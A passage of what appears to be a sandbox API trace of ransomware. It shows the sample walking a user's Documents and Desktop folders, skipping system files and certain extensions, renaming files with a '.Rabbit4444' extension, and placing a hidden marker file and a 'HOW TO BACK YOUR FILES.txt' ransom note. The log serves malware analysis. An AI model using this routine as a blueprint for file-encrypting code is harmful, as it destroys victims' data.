0x117d10 [0049.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0049.950] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16510, lpName=0x0) returned 0x298 [0049.950] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16510) returned 0x70000 [0049.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.953] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.953] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14126402057) returned 1 [0049.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.953] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0049.953] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.954] CloseHandle (hObject=0x298) returned 1 [0049.954] CloseHandle (hObject=0x278) returned 1 [0049.955] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\YwT0L2uHZ5 4t5VAQEl.odp.Rabbit4444") returned 88 [0049.955] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\YwT0L2uHZ5 4t5VAQEl.odp" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\ywt0l2uhz5 4t5vaqel.odp"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\YwT0L2uHZ5 4t5VAQEl.odp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\ywt0l2uhz5 4t5vaqel.odp.rabbit4444"), dwFlags=0x1) returned 1 [0049.956] InterlockedExchangeAdd (in: Addend=0xff618, Value=90640 | out: Addend=0xff618) returned 24501152 [0049.956] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3735 [0049.956] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb98c2190, ftCreationTime.dwHighDateTime=0x1d4d4fd, ftLastAccessTime.dwLowDateTime=0x70d4dbb0, ftLastAccessTime.dwHighDateTime=0x1d4cc13, ftLastWriteTime.dwLowDateTime=0x70d4dbb0, ftLastWriteTime.dwHighDateTime=0x1d4cc13, nFileSizeHigh=0x0, nFileSizeLow=0x1620b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YwT0L2uHZ5 4t5VAQEl.odp", cAlternateFileName="YWT0L2~1.ODP")) returned 0 [0049.956] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0049.956] lstrcpyW (in: lpString1=0x130eba4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.957] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.957] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.958] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.958] CloseHandle (hObject=0x278) returned 1 [0049.958] CloseHandle (hObject=0x27c) returned 1 [0049.958] GetCurrentThreadId () returned 0xd98 [0049.958] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6510 [0049.958] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr" [0049.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115b08 | out: hHeap=0xe0000) returned 1 [0049.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6508 | out: hHeap=0xe0000) returned 1 [0049.958] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr" [0049.958] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\" [0049.958] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\.BFC0E91B00AE8A0620D3" [0049.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\utnr\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.963] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.965] FlushFileBuffers (hFile=0x27c) returned 1 [0049.966] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.966] CloseHandle (hObject=0x27c) returned 1 [0049.967] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr") returned 43 [0049.967] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.967] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb1060a30, ftCreationTime.dwHighDateTime=0x1d4cc75, ftLastAccessTime.dwLowDateTime=0x35f119c0, ftLastAccessTime.dwHighDateTime=0x1d4ce91, ftLastWriteTime.dwLowDateTime=0xe71a0f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0049.967] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.967] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.967] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.967] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.967] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb1060a30, ftCreationTime.dwHighDateTime=0x1d4cc75, ftLastAccessTime.dwLowDateTime=0x35f119c0, ftLastAccessTime.dwHighDateTime=0x1d4ce91, ftLastWriteTime.dwLowDateTime=0xe71a0f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.967] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.967] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.967] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.967] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.967] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.967] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe71a0f0f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe71a0f0f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe71a0f0f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.968] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.968] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.968] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c71790, ftCreationTime.dwHighDateTime=0x1d4d560, ftLastAccessTime.dwLowDateTime=0xb9b673d0, ftLastAccessTime.dwHighDateTime=0x1d4d2b6, ftLastWriteTime.dwLowDateTime=0xb9b673d0, ftLastWriteTime.dwHighDateTime=0x1d4d2b6, nFileSizeHigh=0x0, nFileSizeLow=0x306d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oqmQZYL-UF.pps", cAlternateFileName="OQMQZY~1.PPS")) returned 1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2="Rabbit4444.exe") returned -1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2=".") returned 1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2="..") returned 1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2="windows") returned -1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2="bootmgr") returned 1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2="pagefile.sys") returned -1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2="boot") returned 1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2="ids.txt") returned 1 [0049.968] lstrcmpiW (lpString1="oqmQZYL-UF.pps", lpString2="NTUSER.DAT") returned 1 [0049.968] lstrcpyW (in: lpString1=0x130eb90, lpString2="oqmQZYL-UF.pps" | out: lpString1="oqmQZYL-UF.pps") returned="oqmQZYL-UF.pps" [0049.968] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\oqmQZYL-UF.pps", dwFileAttributes=0x0) returned 1 [0049.968] lstrlenW (lpString="oqmQZYL-UF.pps") returned 14 [0049.968] lstrlenW (lpString="Rabbit4444") returned 10 [0049.969] lstrcmpiW (lpString1="ZYL-UF.pps", lpString2="Rabbit4444") returned 1 [0049.969] lstrlenW (lpString=".dll") returned 4 [0049.969] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0049.969] lstrlenW (lpString=".lnk") returned 4 [0049.969] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0049.969] lstrlenW (lpString=".ini") returned 4 [0049.969] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0049.969] lstrlenW (lpString=".sys") returned 4 [0049.969] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0049.969] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\oqmQZYL-UF.pps" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\utnr\\oqmqzyl-uf.pps"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.969] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.969] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14127971649) returned 1 [0049.969] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=12397) returned 1 [0049.969] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0049.969] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0049.969] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3370, lpName=0x0) returned 0x298 [0049.969] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3370) returned 0x70000 [0049.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.970] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14128106449) returned 1 [0049.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0049.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0049.970] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.971] CloseHandle (hObject=0x298) returned 1 [0049.971] CloseHandle (hObject=0x278) returned 1 [0049.971] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\oqmQZYL-UF.pps.Rabbit4444") returned 69 [0049.971] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\oqmQZYL-UF.pps" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\utnr\\oqmqzyl-uf.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\oqmQZYL-UF.pps.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\utnr\\oqmqzyl-uf.pps.rabbit4444"), dwFlags=0x1) returned 1 [0049.972] InterlockedExchangeAdd (in: Addend=0xff618, Value=12400 | out: Addend=0xff618) returned 24591792 [0049.972] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3738 [0049.972] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59e34d80, ftCreationTime.dwHighDateTime=0x1d4c937, ftLastAccessTime.dwLowDateTime=0x7c747740, ftLastAccessTime.dwHighDateTime=0x1d4c7e6, ftLastWriteTime.dwLowDateTime=0x7c747740, ftLastWriteTime.dwHighDateTime=0x1d4c7e6, nFileSizeHigh=0x0, nFileSizeLow=0xbcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rZAFx7yv0j4OpKr0.rtf", cAlternateFileName="RZAFX7~1.RTF")) returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2="Rabbit4444.exe") returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2=".") returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2="..") returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2="windows") returned -1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2="bootmgr") returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2="pagefile.sys") returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2="boot") returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2="ids.txt") returned 1 [0049.972] lstrcmpiW (lpString1="rZAFx7yv0j4OpKr0.rtf", lpString2="NTUSER.DAT") returned 1 [0049.972] lstrcpyW (in: lpString1=0x130eb90, lpString2="rZAFx7yv0j4OpKr0.rtf" | out: lpString1="rZAFx7yv0j4OpKr0.rtf") returned="rZAFx7yv0j4OpKr0.rtf" [0049.972] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\rZAFx7yv0j4OpKr0.rtf", dwFileAttributes=0x0) returned 1 [0049.972] lstrlenW (lpString="rZAFx7yv0j4OpKr0.rtf") returned 20 [0049.972] lstrlenW (lpString="Rabbit4444") returned 10 [0049.972] lstrcmpiW (lpString1="4OpKr0.rtf", lpString2="Rabbit4444") returned -1 [0049.972] lstrlenW (lpString=".dll") returned 4 [0049.972] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0049.973] lstrlenW (lpString=".lnk") returned 4 [0049.973] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0049.973] lstrlenW (lpString=".ini") returned 4 [0049.973] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0049.973] lstrlenW (lpString=".sys") returned 4 [0049.973] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0049.973] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\rZAFx7yv0j4OpKr0.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\utnr\\rzafx7yv0j4opkr0.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.973] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.973] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14128358968) returned 1 [0049.973] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3023) returned 1 [0049.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0049.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0049.973] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xed0, lpName=0x0) returned 0x298 [0049.973] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xed0) returned 0x70000 [0049.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0049.974] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0049.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.974] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14128473737) returned 1 [0049.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0049.974] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0049.974] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.974] CloseHandle (hObject=0x298) returned 1 [0049.974] CloseHandle (hObject=0x278) returned 1 [0049.975] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\rZAFx7yv0j4OpKr0.rtf.Rabbit4444") returned 75 [0049.975] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\rZAFx7yv0j4OpKr0.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\utnr\\rzafx7yv0j4opkr0.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\rZAFx7yv0j4OpKr0.rtf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\utnr\\rzafx7yv0j4opkr0.rtf.rabbit4444"), dwFlags=0x1) returned 1 [0049.975] InterlockedExchangeAdd (in: Addend=0xff618, Value=3024 | out: Addend=0xff618) returned 24604192 [0049.975] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3739 [0049.975] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59e34d80, ftCreationTime.dwHighDateTime=0x1d4c937, ftLastAccessTime.dwLowDateTime=0x7c747740, ftLastAccessTime.dwHighDateTime=0x1d4c7e6, ftLastWriteTime.dwLowDateTime=0x7c747740, ftLastWriteTime.dwHighDateTime=0x1d4c7e6, nFileSizeHigh=0x0, nFileSizeLow=0xbcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rZAFx7yv0j4OpKr0.rtf", cAlternateFileName="RZAFX7~1.RTF")) returned 0 [0049.975] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0049.976] lstrcpyW (in: lpString1=0x130eb90, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.976] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\uTNr\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\utnr\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.976] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.976] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.976] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.976] CloseHandle (hObject=0x278) returned 1 [0049.976] CloseHandle (hObject=0x27c) returned 1 [0049.976] GetCurrentThreadId () returned 0xd98 [0049.976] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0049.976] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Desktop", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0049.976] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf7920 | out: hHeap=0xe0000) returned 1 [0049.976] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0049.977] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Desktop" | out: lpString1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0049.977] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0049.977] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Desktop\\.BFC0E91B00AE8A0620D3" [0049.977] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\desktop\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.977] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.980] FlushFileBuffers (hFile=0x27c) returned 1 [0049.981] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.981] CloseHandle (hObject=0x27c) returned 1 